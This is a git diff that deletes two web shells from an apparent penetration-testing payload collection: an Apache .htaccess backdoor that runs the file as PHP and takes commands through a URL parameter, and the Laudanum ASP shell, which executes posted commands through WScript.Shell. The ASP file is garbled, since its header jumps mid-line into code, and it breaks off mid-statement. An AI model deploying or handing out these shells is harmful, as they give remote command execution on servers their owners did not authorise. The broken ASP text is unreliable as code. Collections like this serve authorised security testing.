diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell
deleted file mode 100644
index 0b3b0682..00000000
--- a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell
+++ /dev/null
@@ -1,23 +0,0 @@
-# htaccess backdoor shell
-# this is relatively stealthy compared to a typical webshell
-
-# overriding deny rule
-# making htaccess accessible from the internet
-# without this you'll get a HTTP 403
-
-Require all granted
-Order allow,deny
-Allow from all
-
-
-# Make the server treat .htaccess file as .php file
-AddType application/x-httpd-php .htaccess
-
-#
-
-# To execute commands you would navigate to:
-# http://vulnerable.com/.htaccess?cmd=YourCommand
-
-# If system(); isnt working then try other syscalls
-# e.g. passthru(); shell_exec(); etc
-# If you still cant execute syscalls, try bypassing php.ini via htaccess
diff --git a/Upload Insecure Files/Extension ASP/shell.asp b/Upload Insecure Files/Extension ASP/shell.asp
deleted file mode 100644
index b2caf599..00000000
--- a/Upload Insecure Files/Extension ASP/shell.asp
+++ /dev/null
@@ -1,83 +0,0 @@
-<%
-' *******************************************************************************
-' ***
-' *** Laudanum Project
-' *** A Collection of Injectable Files used during a Penetration Test
-' ***
-' *** More information is available at:
-' *** http://laudanum.secureideas.net
-' *** laudanum@secureideas.net
-' ***
-' *** Project Leads:
-' *** Kevin Johnson
-' ***
-' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
-' ***
-' ********************************************************************************
-' ***
-' *** Updated and fixed by Robin Wood
-' *** Updated and fixed by Tim Medin "1.2.3.4" then
- response.Status="404 Page Not Found"
- response.Write(response.Status)
- response.End
-end if
-
-if Request.Form("submit") <> "" then
- Dim wshell, intReturn, strPResult
- cmd = Request.Form("cmd")
- Response.Write ("Running command: " & cmd & " ")
- set wshell = CreateObject("WScript.Shell")
- Set objCmd = wShell.Exec(cmd)
- strPResult = objCmd.StdOut.Readall()
-
- response.write "